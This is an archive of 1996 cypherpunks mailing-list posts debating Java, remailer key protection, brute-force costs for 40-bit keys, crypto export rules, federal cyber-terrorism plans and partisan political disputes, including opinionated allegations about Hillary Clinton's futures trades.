From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Thu, 6 Jun 1996 12:21:21 +0800
To: cypherpunks@toad.com
Subject: Re: On the Hill: Child Porn "Morphing"
In-Reply-To: <Pine.SUN.3.91.960604163805.11159A-100000@polaris>
Message-ID: <199606051740.KAA25482@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn <unicorn@schloss.li> writes:

 > I'd like to see exactly how they word the proposed
 > prohibitons.  What constitutes "child" when the face painted
 > on is pure artistry?  Will we see a simple and strict
 > prohibition over modifiying sexually explicit pictures to
 > make them appear to be of younger models (whatever their
 > apparent age may be)?  Will we see a subjective test as to
 > what is "child looking" enough?

 > Silliness.  All silliness.

Indeed.  One should note that some states already have
legislation which contains the magic phrase "appears to be" in
the specification of legal ages.  The testimony of a willing
pediatrician is all that is necessary to convert some random
fuzzy GIF into a lengthy prison term.

Morphing technology is a new approach to creating what appear to
be sexual depictions of children, but there have also been
prosecutions based on more traditional technology, like sissors
and paste.

Personally, I don't think it should be possible to commit a
crime in the privacy of ones home using only sissors, Scotch
Tape, an old Playboy, and a JC Penny Catalog.

Those familiar with "The Varieties of Religious Experience" will
recall something called "The Pious Imagination", which results in
every vaguely anthropomorphic smudge being seen as the face of
Christ.  I suspect the Child Sex Hysterics are afflicted with a
similar trait, which similarly transforms image ambiguity into
pre-teen orgies.

 > Prediction: Some manner of law will be on the books (Or
 > perhaps passed, but unsigned) before the election
 > attempting to prohibit some form of this activity. Certainly
 > Clinton is not going to veto such a bill before the
 > election, which is doubtlessly when the right is going to
 > try to push it through.  (Can they streamline it enough to
 > get a vote in time?)

Wasn't Orin Hatch the big proponent of "synthetic child porn"
legislation?  I remember him harping on the subject a while back.

Is he behind this new push?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: minow@apple.com (Martin Minow)
Date: Thu, 6 Jun 1996 12:49:33 +0800
To: cypherpunks@toad.com
Subject: Re: Java
Message-ID: <v02140b02addb7880650e@[17.202.12.102]>
MIME-Version: 1.0
Content-Type: text/plain


> From Tim May's citation of Vladimir Z. Nuri:
>
>> maybe Java is all about a generation
>>gap in computing. hey!! the first language that the "older generation"
>>hates.

Better try another language, I'm quite a bit older than Tim, and like
Java very much. It's one of the best languages I've seen since Algol 60.
To learn the language, I'd recommend Java in 21 Days and, as a quick
desk reference, Java in a Nutshell.

Tim May writes
> I think
>the security problems are, first of all, no worse vis-a-vis the language
>itself than problems with any language.

They're better than most, as programmers can't "escape" from memory
and variable typing bounds.
>
>Until Java and
>associated programs and tools appeared, I was seriously thinking about
>getting a Pentium or Pentium Pro (shudder, even though I admire my former
>employer and current stock benefactor, Intel) and putting Linux on it.

If you're interested in Linux, you can get Linux for Power PC. Check out
http://www.mklinux.apple.com for details. Currently, it runs on the
first-generation Power PC's (6100, 7100, 8100).

>
>Perry has some valid points vis-a-vis the most naive uses of applets. Were
>I the security manager of Morgan Stanley, I would certainly not want
>traders downloading "kewl" applets and (possibly) causing Big Problems. So
>what else is new?

The use of signed classes makes this practical as "kewl," but unsigned,
applets should be safe unless the user makes a stupid decision regarding
default applet permissions (and ignoring the Trojan Horse problem). The
attraction to (for example) Morgan Stanley, is that it minimizes their
risk when employees must work outside the corporate firewall. For example,
an employee making an external sales call can dial into Morgan Stanley
and use an appropriately privileged signed applet to access private data
on the corporate server as well as files on the employee's portable computer).

>
>Java as a language and as a platform-independent implementation is an
>achievement.

It's also not owned by the evil Redmond empire and does not appear
to be owned by a hardware vendor (as, when compared with Intel,
Motorola, and the Intel clones, Sun is a minor player in the hardware
arena).

It will be very interesting to see what happens when ANSI/ISO/IEEE decide
that they must "standardize" the language. I'm currently reading
"The Hubble Wars" and don't hold out mush hope that the official standard
dies will actually improve the language.

>
>And in some ways a more important comparison is to Perl and TCL, along with
>more obscure languages like Python and REXX. The welter of Net-oriented
>languages shows signs of  being much-simplified by the wide adoption of
>Java. It will be interesting to watch the next several years of
>developments.
>
Rather than compare Java to Perl/TCL, try comparing it to Visual Basic,
C, C++, Fortran, and COBOL.

Martin Minow
minow@apple.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: minow@apple.com (Martin Minow)
Date: Thu, 6 Jun 1996 15:17:36 +0800
To: declan@well.com
Subject: re: Fight-Censorship Dispatch #12: CDA deathwatch, copyright update
Message-ID: <v02140b03addb7e62c704@[17.202.12.102]>
MIME-Version: 1.0
Content-Type: text/plain


In "Fight-Censorship Dispatch #12", Declan McCullagh writes about
"everybody's favorite net.loon," Fred Cherry:

>Whatever you think of Cherry's antics, you gotta grant him one thing
> not many people have the balls to demand that a Federal court uphold
> their right to flame.

I suspect that Tom Payne would -- Cherry seems from your description
to be a prize example of "the lonely pamphleteer."

It would be interesting to know what Nat Hentoff thinks of Fred.

Martin Minow
minow@apple.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Thu, 6 Jun 1996 10:09:49 +0800
To: cypherpunks@toad.com
Subject: Re: whitehouse web incident, viva la web revolution
Message-ID: <199606051551.LAA26104@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

"Vladimir Z. Nuri" <vznuri@netcom.com> wrote:

<much elided...>

>- ------- Forwarded Message
>From: "Steve Wingate" <steve@linex2.linex.com>

<...>

>The frustrating thing about Clinton's scandals is that the press
>focuses on two-bit scandals of little importance, such as Whitewater
>and this ridiculous travel office "scandal", while ignoring much more
>significant dirt, such as the Mena, Arkansas contra supply and drug
>operation...

As many of you can imagine, I am a fan of this site. Naturally,
I think the Whitehouse aide particularly wanted to squelch the
Mena information.

It strikes me as a sort of strange deja-vu that this bigger-than-
Watergate issue is so well covered-_UP_ by pretty-much every U.S.
media outlet except (oddly) the W$J, Penthouse, and "High Times,"
(a pot-oriented magazine). I guess that since Clinton is the most
Nixonian president since Nixon himself this should not surprise
me, and I should just expect Clinton's re-election, followed by
his resignation, as yet-another repeat-of-history. Expecting any
{partisan D.= Fiske, and then R.= Starr} "Independent" counsel to
open this can of hypocritical worms without constant prodding is
unrealistic, IMNSHO.

I just convinced their Webmaster, Mark Saltveit, to go get PGP.
I'm talking him through the wonders of using it now.

<...>

>Real People For Real Change is registered with the Federal Election
>Commission as a non-affiliated, independent political action
>committee.

I have even convinced him to look for any dirt on the Libertarian
candidates (not terribly a difficult job in Mr. Schiff's case <g>).
JMR

Regards, Jim Ray -- DNRC Minister of Encryption Advocacy

"Most of the presidential candidates' economic packages involve
 'tax breaks,' which is when the government, amid great fanfare,
 generously decides not to take quite so much of your income.
 In other words, these candidates are trying to buy your votes
 with your own money." -- Dave Barry
___________________________________________________________________
PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8
  <liberty@gate.net>       http://www.shopmiami.com/prs/jimray
___________________________________________________________________


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh.

iQCVAwUBMbWh+m1lp8bpvW01AQH0MAQApIggCeEKeMAzDNxcs3A9AWi0gfLEDDug
RDietyaaHEBViEcf6EPDjQbsNo0JIJnp6tV9xOkitNbKLt0Z98qBid9VAS6Prv5F
njndwzAirFuOhjnuBkDyKPkwaz8oipS2ulifJzLTj7weHLKUSfDp8aUBBoeoY4JO
merLKkkqvmo=
=l06T
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcs Mixmaster Remailer <mix@anon.lcs.mit.edu>mix-admin@anon.lcs.mit.edu
Date: Thu, 6 Jun 1996 10:21:23 +0800
To: cypherpunks@toad.com
Subject: Re: How can you protect a remailer's keys?
In-Reply-To: <addac392000210049493@[206.170.115.3]>
Message-ID: <199606051600.MAA02582@anon.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> From: loki@infonex.com (Lance Cottrell)
> Date: Tue, 4 Jun 1996 22:02:11 -0700
> 
> The best solution I could come up with (and was willing to write and use)
> is to specify the passphrase on the command line argument to the compiler
> 
> make solaris -DPASS="foozooblue"
> 
>                 -Lance

A far better solution would be to have a long-running daemon hold the
secret key.  The mixmaster client could talk to the key daemon through
a unix-domain socket with the permission bits set such that only the
mixmaster user can connect.  Each time the machine is rebooted, the
operator must start the daemon and give it a passphrase.

This has two advantages.  First, it's a lot harder to back up the key
by accident.  If the key ever starts making it only your daily
backups, you are completely hosed because erasing a bunch of mag tapes
would take a lot of time--and maybe you also want to keep your
backups.

Second, if your machine is seized or someone gains unauthorized
physical access to it, the easiest way to get a root shell is by
rebooting single-user.  However, if the only cleartext copy of a key
is in memory rather than in the filesystem, once the machine is
rebooted the secret key is lost.

- - mix-admin@anon.lcs.mit.edu

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAwUBMbWrj0TBtHVi58fRAQEkdQP/e7mouEmphgDmn0NKbaCM4lYnT2WbCFsk
irM2GjttiBdpQxr2QDJKBgmHnuGc09xdiexnGnn4bDFie70YDH2Zma3xF/0OvZeQ
DcgAz/0XwkAGPeLCSg8gfeykWwC0HUJlvGtmOwTQKFn5XtlqFM7pKIYF7lnFtoGY
AX/GoGauum4=
=rhyW
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 6 Jun 1996 15:38:04 +0800
To: Raph Levien <raph@cs.berkeley.edu>
Subject: Re: Java
In-Reply-To: <31B58982.1F54@cs.berkeley.edu>
Message-ID: <199606051901.MAA14910@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>
>>  c is "sort of" portable. it is
>> "in theory" portable. Java is portable "in theory and practice".
>
>   This point is simply not true, at least for Java as it exists in 
>Spring 1996. Almost every Java applet I've seen has little UI glitches 
>that prevent it from displaying and operating correctly on all 
>platforms.

you caveat, as you write it, is very significant. what I wrote about
was that the burden of portability is placed on the PROGRAMMER for
C. the burden of portability is placed on the Java language implementers
for Java. a BIG difference. Java may be *riddled* with bugs at the moment.
but who is responsible for fixing them? every single programmer in 
existence who wants to port code? (that is what effectively happens
with C makefiles) or the language designers? i.e. Java Inc.?  you
can see the tremendous difference here. the level of portability
*demanded* by the language specification of Java is far higher than
C. whether this works out in practice will take years of fine tuning.
but look how old C is-- 20 years-- and has its portability gotten
better with time, or worse? give Java another few years and its going
to be so good that no one will be arguing with supporters.

 Further, there are little glitches in the language 
>implementation and library design that often cause portability problems. 
>For example, the first cut of Hal's PGP applet had the standard UI 
>problems, plus the fact that a "spinner" thread caused the entire 
>browser to lock up -- on Unix, but not on Windows. 

whose problem is this? his or Java implementors? not his. granted,
in practice he may have to design around it. but Java is in its infancy
and you can't demand mature characteristics. as I emphasized, it
is evolving. it is a step in the right direction. you can't ask Excel
to be written before the PC has been invented. similarly, Java will
not crystallize for some time yet. (however UI problems do seem to me
to be the source of the greatest amount of intrinsic compatibility
problems. I was not wholly impressed with the labor that seemed to
go into the Java UI at first-- it seemed like a little of an afterthought)

And this was a 5000 
>line of code applet. Hal was able to fix the problems, but it's easy to 
>see how the effort involved in this "portability engineering" could 
>become comparable to your thousand-line makefile as applications scale 
>up.
>   The promise is there, but Java has not yet delivered.

I agree that in practice Java is pretty weak at the moment. but consider
how much money Sun has made from it. do you realize they poured 5M
initial development costs into it? can you be sure they will recoup
that? they probably have, but they've been incredibly generous. I am
never ceased to be amazed at how much people rant at stuff that is
given away for free or amazingly low cost.

>   Another concern with Java is that it acheives portability at the cost 
>of enforcing a lowest common denominator. For example, all real Windows 
>applications support OLE, and all real Mac applications support Apple 
>Events. Java applets, and even applications, can't do either. To me, 
>that makes the accomplishment of portability a bit less impressive, even 
>if it were so.

Java cannot solve every programming problem on the planet. it cannot
be a secure OS. it cannot give you a worldwide object standard. Java
has an event mechanism just as Apple does, and it supports object
oriented programming just as OLE is a standard associated with OO.
IMHO it did what it did well. if you want OLE go to microsoft, if
you want Apple Events program on the apple!!! if you want one language
in which you don't have to worry about every standard in the world,
try Java.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com
Date: Thu, 6 Jun 1996 00:43:49 +0800
To: cypherpunks@toad.com
Subject: Re: Markoff in NYT on NTT/RSA chip
In-Reply-To: <v03007101adda1bc74f88@[206.151.234.118]>
Message-ID: <19960605120618.2319.qmail@ns.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


jonathon writes:

 > 	<< Any guesses on just how long ITAR stays around, once
 > 	several companies announce they are terminating the employment
 > 	of 1000+ people, for work overseas, because of ITAR?  >> 

You're assuming that the "jobs" card beats the "crypto-terrorist"
card.  I wouldn't count on it.

-russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
Crynwr Software   | Crynwr Software sells packet driver support | PGP ok
11 Grant St.      | +1 315 268 1925 voice | It's no mistake to err on
Potsdam, NY 13676 | +1 315 268 9201 FAX   | the side of freedom.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robin Powell <rpowell@algorithmics.com>
Date: Thu, 6 Jun 1996 10:08:30 +0800
To: warlord@MIT.EDU
Subject: Re: Why PGP isn't so ubiquitous (was NRC Session Hiss)
In-Reply-To: <9606041912.AA01215@bill-the-cat.MIT.EDU>
Message-ID: <96Jun5.120831edt.20482@janus.algorithmics.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> Derek Atkins <warlord@MIT.EDU> writes:

    > So, would you rather see a document right away, or code released
    > sooner?  Take your pick and let me know. :)

Code sooner.

-Robin




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Thu, 6 Jun 1996 01:14:53 +0800
To: cypherpunks@toad.com
Subject: Terrorism Hysteria on the Net
Message-ID: <199606051227.MAA00334@pipe2.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Today's USA has a pair of front page stories: 
 
 
"Feds ready anti-terror cyberteam" and "Terrorism on the Net -- Post-Cold
War hysteria or a national threat?" 
 
 
They lay out the nightmares and the valiant TLA-daydreams to out-fund the
hackers and out-flummox the public. 
 
 
"You bring me a select group of hackers and within 90 days I'll bring this
country to its knees, " says Jim Settle, retired director of the FBI's
computer crime squad. 
 
 
"The threat is there, it's very real," says CIA General Counsel Jeffrey
Smith. "If we have a Unabomber who decides to launch an attack with a PC
instead of a bomb, (there could be) real damage." 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 6 Jun 1996 10:55:13 +0800
To: "Bruce M." <brucem@wichita.fn.net>
Subject: Re: Cost of brute force decryption
In-Reply-To: <Pine.BSI.3.91.960605092010.23845A-100000@wichita.fn.net>
Message-ID: <199606051632.MAA12216@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Everyone seems to be arguing about whether brute force decryption of
RC-40 costs "tens of thousands" or not.

The answer is it costs pennies. Literally.

See the "Big Seven" paper on why key lengths of over 80 bits are
required to read the details.

ftp://ftp.research.att.com/dist/mab/keylength.txt

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hallam-Baker <hallam@ai.mit.edu>
Date: Thu, 6 Jun 1996 11:09:15 +0800
To: cypherpunks@toad.com
Subject: Re: Richard Stallman on RSA, Zimmermann, crypto
In-Reply-To: <4p44o9$aan@life.ai.mit.edu>
Message-ID: <31B5BD2D.41C6@ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Deranged Mutant wrote:
> 
> Not to defend or condemn RSA folx or patents, etc., but sometime ago
> (recently) I read or was told or perhaps hallucinated that PGP3 was
> going to include non-RSA algorithms that didn't suffer the patent
> stickiness (El Gammel based on DSA?)

DSA is based on El-Gamal, not the other way round. Although it is likely 
that a future version of PGP will include these algorithms the problem 
arises from the Diffie-Helleman patent and not the RSA patent. When this 
expires in 1997 it is certain that many products using public key 
cryptosystems will be avaliable in an unrestricted fashion.

	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hallam-Baker <hallam@ai.mit.edu>
Date: Thu, 6 Jun 1996 11:56:21 +0800
To: "Vladimir Z. Nuri" <cypherpunks@toad.com
Subject: Re: whitehouse web incident, viva la web revolution
In-Reply-To: <4p370g$r77@life.ai.mit.edu>
Message-ID: <31B5C131.167E@ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Vladimir Z. Nuri wrote:
<Uninformed crap>


Its worth pointing out that a complaint to an editor is not 
necessarily pressure. Did the Whitehouse threaten to sue 
HotWired? What _pressure_ was applied?

I find Meeks' style somewhat tiresome. It is tabloid jornalism
rather than reasoned argument. His dislike for the Clinton is 
well known - he recently accused the administration of being
fascist. I know of no evidence that the Clinton administration
has a genocide policy, it is an insult to the 10 million civilians
murdered by Hitler to use the term facist simply as a term of abuse,
especialy if it is being used as a substitute for an argument.

Point of fact: the skeleton closet does not know how traded options
work.

If one sells a traded option one is liable to pay the broker if the
market moves the opposite way to that hoped for. Normally the broker
asks a client to put up a deposit or "margin" to ensure that the
broker can recoup the money. In this case the broker knew that Hilary
had good credit and so accepted only a token deposit as "margin". Had
the market moved in the opposite direction Hillary would have been
liable for very much more than $1000, she was liable for hundreds of
thousands.

In most cases it is profitable to sell options, it is only if the market
moves in the "wrong" direction that one can lose out. In such cases the
losses are unlimited - the potential profit being fixed. This is why
most punters buy options - the potential loss is limited. 

You can see a similar effect in the market each time there is a "short
squeeze". A lot of people bet on Netscape going down in price because it
was overvalued. The number of short positions turned out to be higher
than the number of shares on offer which meant that many people were
having to buy shares at high prices to cover their positions. This is
how lack of confidence in a stock can send it through the roof. The free
market - don't you just love it?


		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Thu, 6 Jun 1996 04:37:54 +0800
To: cypherpunks@toad.com
Subject: USA on Feds Cyberteam
Message-ID: <199606051318.NAA03600@pipe2.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   USA Today, June 5, 1996, p. 1. 
 
 
   Feds ready anti-terror cyberteam 
 
   By M.J. Zuckerman 
 
 
   The Clinton administration, citing the threat of electronic 
   terrorist attacks, is taking steps to secure cyberspace. 
 
   The administration is expected to announce later this month 
   formation of: 
 
   + An emergency response task force, directed by the FBI and 
   based in the Justice Department, to manage any terrorist 
   incident involving an attack in cyberspace. 
 
   The Cyber Security Assurance Group would funcaon as both an 
   emergency response team and investigative body. It will 
   respond to any collapse of the National Information 
   Infrastructure -- the nation's vital computer systems such 
   as banking, transportation and telecommunications. 
 
   "The threat is there, it's very real," says CIA General 
   Counsel Jeffrey Smith. "If we have a Unabomber who decides 
   to launch an attack with a PC instead of a bomb, (there 
   could be) a great deal of damage." 
 
   + A commission, dominated by national security 
   representatives and chaired by a private sector person, to 
   deliver within 12 months a national policy on cyberspace 
   security. 
 
   The commission faces difficulty in balancing government 
   inter-agency turf battles as well as dealing with industry 
   and the private sector, which oppose Internet regulation. 
 
   "This is one of the toughest issues government faces 
   today," says Smith. 
 
   The initiatives have emerged from an unprecedented, closely 
   guarded series of meeangs held in recent months between 
   leading administration officials from law enforcement, 
   national security and defense. 
 
   Attorney General Janet Reno, acting under a classified 
   presidential directive issued late last year in response to 
   the Oklahoma City bombing, chairs the panel. 
 
   It includes the directors of the CIA and FBI along with 
   Cabinet secretaries from Treasury, Commerce, Transportation 
   and Energy. 
 
   Today, the Senate Permanent Subcommittee on Investigations 
   holds the second in a series of hearings examining 
   cyberspace security and threats to information systems. 
 
   The panel's minority staff is expected to endorse 
   administration proposals to clearly draw national policy on 
   information security but calls for a more ambitious 
   emergency response effort by government. 
 
   [End] 
 
   ---------- 
 
   To see adjoining UT article (9 kb),  
    
   "Post-Cold War hysteria or a national threat?" 
 
      http://pwp.usa.pipeline.com/~jya/hysteria.txt 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Thu, 6 Jun 1996 16:36:23 +0800
To: cypherpunks@toad.com
Subject: Re: How can you protect a remailer's keys?
Message-ID: <v02140b00addba12bd414@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain



Lance Cottrell writes:
> At 11:55 PM 6/1/96, Bill Stewart wrote:
> >Encryption is critical for protecting against traffic analysis,
> >but it's tough to protect a remailer's keys.  Unlike regular email,
> >where you can type the key in as you read it, remailers need to
> >run automatically once you set them up.  Some of the choices are:
> >- leave it around in plaintext with only Unix file protections
> >- type it in to a long-running remailer process
> >- SSL-based remailers, where the web server handles crypto on
> >        a per-machine basis instead of per-remailer
> >- use unauthenticated Diffie-Hellman
> >- off-line or off-site remailer such as a POP3 winsock remailer
> >- human intervention on every message
> >
> >Anybody have any other approaches?  These are mostly weak,
> >annoying, or both.
>
> The best solution I could come up with (and was willing to write and use)
> is to specify the passphrase on the command line argument to the compiler

This is little better than leaving it around in a plaintext file, a pass
or two with gdb on your binary and I have your private key.

The "difficult, expensive, and pain in the ass code to write" solution that
I favor is to use secure multiparty computation to create the remailer.  It
does not exist on a single host, but is rather the sum of a collection of
hosts running on widely seperated machines.  It has the same type of drawback
as a per-execution password entered into a long-lived process (anyone with
root access to the host can yank it out of memory with little difficulty,)
but this is spread out across a larger collection of hosts, making the task
of actually getting the complete password somewhat difficult.  Getting a
subset of the individual host passwords does not provide any partial
information about the collective password (similar to secret sharing.)
The other drawback is that certain operations can be very slow, you end
up emulating a circuit with a _very_ slow clock (8-10 Hz.  Not MHz, not KHz,
but 8-10 ticks/second); as compensation you get a word-size that if
effectively infinite. I have to continue work on a subset of these methods
for a secure digital poker/card-playing system over the next couple of months
and if I have some spare time I might see just how difficult creating a
toolkit for building such virtual circuits really is...

OTOH, a secure PCMCIA or smart-card will probably end up being a better
practical solution.

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@MIT.EDU>
Date: Thu, 6 Jun 1996 11:55:37 +0800
To: cypherpunks@toad.com
Subject: A.Word.A.Day--seigniorage
Message-ID: <9606051737.AA24555@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


>From: Wordsmith <wsmith@wordsmith.org>
>To: linguaphile@wordsmith.org
>Reply-To: anu@wordsmith.org
>Subject: A.Word.A.Day--seigniorage
>Date: Wed, 5 Jun 1996 00:51:14 -0400
>
>sei.gnior.age or sei.gnor.age \'sa-n-y*-rij\ n [ME seigneurage, fr. MF, 
>   right of the lord (esp. to coin money), fr. s]eigneur : a government 
>   revenue from the manufacture of coins calculated as the difference between 
>   the monetary and the bullion value of the silver contained in silver coins
>
> 
>   1996 MARK BERNKOPF, Electronic Cash and Monetary Policy, 
>   "The widespread adoption of electronic cash would deprive Federal
>   authorities of a substantial amount of seignorage, the margin
>   between the face value of currency issued, and the costs of issuing
>   that currency.  In 1994, the Federal Reserve turned about $20 billion
>   in seignorage over to the Treasury."
> 
> 
>...........................................................................
>When you starve with a tiger, the tiger starves last. -Griffin's Thought
> 
>To subscribe or unsubscribe, please send a message to wsmith@wordsmith.org
>with "Subject:" line as "subscribe <Your Real Name>" or "unsubscribe".
>Email anu@wordsmith.org if you have any questions, comments or suggestions.
>Archives, FAQ, words and more at the WWW site: http://www.wordsmith.org/awad/
>
>
_______________________
Regards,            Real generosity toward the future lies in giving 
                    all to the present. - Albert Camus
Joseph  Reagle      http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com
Date: Thu, 6 Jun 1996 04:46:49 +0800
To: cypherpunks@toad.com
Subject: Re: Java
In-Reply-To: <199606041306.JAA08943@jekyll.piermont.com>
Message-ID: <19960605135204.2792.qmail@ns.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


Raph Levien writes:

 >    Another concern with Java is that it acheives portability at the cost 
 > of enforcing a lowest common denominator. For example, all real Windows 
 > applications support OLE, and all real Mac applications support Apple 
 > Events. Java applets, and even applications, can't do either. To me, 
 > that makes the accomplishment of portability a bit less impressive, even 
 > if it were so.

On the other hand, you have the potential for running a second Java
applet inside a first Java applet, achieving OLE in a portable
fashion, across all operating systems.  Encryption everywhere.

-russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
Crynwr Software   | Crynwr Software sells packet driver support | PGP ok
11 Grant St.      | +1 315 268 1925 voice | It's no mistake to err on
Potsdam, NY 13676 | +1 315 268 9201 FAX   | the side of freedom.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 6 Jun 1996 15:56:09 +0800
To: Hallam-Baker <hallam@ai.mit.edu>
Subject: Re: whitehouse web incident, viva la web revolution
In-Reply-To: <31B5C131.167E@ai.mit.edu>
Message-ID: <199606051821.OAA12450@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Phill, quit while you are ahead. It is my opinion, as a person highly
familiar with the markets in question, that Hillary Clinton's profits
were impossible to achieve by any means other than fraud, and that no
honest broker would have allowed her to hold positions in which she
was so far out of mandatory margin requirements and a trivial move
would have wiped out her entire net worth and more.  I do not know of
a single professional in the industry who disagrees with me.

I know of at least one extremely well written study, by Victor
Neiderhoffer (a very successful futures trader) and Caroline Baum (a
reporter for Telerate) that more or less demonstrates that there is no
way that any of what happened could have been legitimate.

The most astounding part of the trading pattern was that Hillary
Clinton did not "let it ride" and earn the money off of repeated
increases in the value of a single investment -- instead, she took all
profits out of her account after each trade and never invested more
than a tiny sum in any transaction. That is to say, she didn't earn
modest profits repeatedly over many trades -- she earned nearly
impossible profits in trade after trade. In spite of withdrawing her
profits after each trade, she racked up an impossible profit of 100
times her initial investment in a tiny period of time. At no time did
she meet margin requirments, and she repeatedly risked more than the
Clinton's entire net worth on what would have been gambles had her
profits not been guaranteed. In spite of her astounding "performance"
she immediately stopped trading after $100,000 in profits had been
accumulated.

There is an obvious trick by which this can be achieved. The broker
writes two tickets -- one to buy, one to sell. One ticket always loses
exactly what the other gains. The winning ticket is assigned to the
bribee, the loser to the person doing the bribing. The mechanism
self-launders the funds.

Hallam-Baker writes:
> Point of fact: the skeleton closet does not know how traded options
> work.

Mr. Baker, she traded FUTURES.

> If one sells a traded option one is liable to pay the broker if the
> market moves the opposite way to that hoped for. Normally the broker
> asks a client to put up a deposit or "margin" to ensure that the
> broker can recoup the money.

Margin requirements are set by the exchanges and the CFTC, not by the
broker in most cases. They are required by law -- not under broker
discretion.

> In this case the broker knew that Hilary
> had good credit and so accepted only a token deposit as "margin".

He's not allowed to. Furthermore, no sane broker would have allowed a
customer to hold a position in which a small move would have more than
wiped out the customer's entire net worth.

> In most cases it is profitable to sell options,

Futures, Mr. Baker.

> it is only if the market moves in the "wrong" direction that one can
> lose out. In such cases the losses are unlimited - the potential
> profit being fixed. This is why most punters buy options - the
> potential loss is limited.

Hillary Clinton was trading FUTURES.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean T Carnes <crisper@ascensionet.com>
Date: Sat, 8 Jun 1996 04:53:40 +0800
To: "'cypherpunks@toad.com>
Subject: Banking's Physical Security
Message-ID: <01BB545E.2DDAE5C0@ppp3>
MIME-Version: 1.0
Content-Type: text/plain


	We all know that banks are very highly protected as far as their money goes but how safe are there computers?  I live very close to a computer database collecting company that collects the data related to many banks in the area.  It is all done through land lines and is not very well protected.  They aren't very careful about who or what they let into the building also.  If someone were to cut the lines the banks in the area would be out for days and they wouldn't have a means to do interbank transactions outside of the immediate area.  Has anyone else seen this in there area or heard of it. Wouldn't it be a better idea to do the transactions by satellite.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <root@edmweb.com>
Date: Thu, 6 Jun 1996 16:56:14 +0800
To: Deranged Mutant <WlkngOwl@unix.asb.com>
Subject: Re: Cost of brute force decryption
In-Reply-To: <199606050631.CAA01285@unix.asb.com>
Message-ID: <Pine.BSF.3.91.960605143511.190B-100000@bitbucket.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


> > 	"For example a 40-bit key takes about $10,000 worth of supercomputer 
> > time and two weeks to crack.  Although this key may be adequate to 
> > protect my checking account, it's probably not large enough for the 
> > accounts of a major corporation.
> 
> The figures look familiar.  No references around.  I'm not sure it would 
> require a whole two weeks for 40-bits, though.  Possibly less than a 
> day? (Or was that why you asked baout the figures?)

Um, These 'NT Magizine' people are rather clueless. A $400 FPGA can crack
a 40 bit key in an average of 5 hours. See the report by seven well-known
experts at http://www.bsa.org/bsa/cryptologists.html


=====================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)    |
| Email: steve@edmweb.com   Home Page: http://www.edmweb.com/steve/ |
| PGP (2048/9F317269) Fingerprint: 11C89D1CD67287E68C09EC52443F8830 |
|          -- Disclaimer: JMHO, YMMV, TANSTAAFL, IANAL. --          |
===================================================================:)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@mit.edu>
Date: Thu, 6 Jun 1996 16:06:41 +0800
To: cypherpunks@toad.com
Subject: ICE - International Cryptography Experiment
Message-ID: <9606051848.AA25257@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


I've seen some mention of international cryptographic CAPI issues, and I
think it is of great importance. However, I don't think many people have had
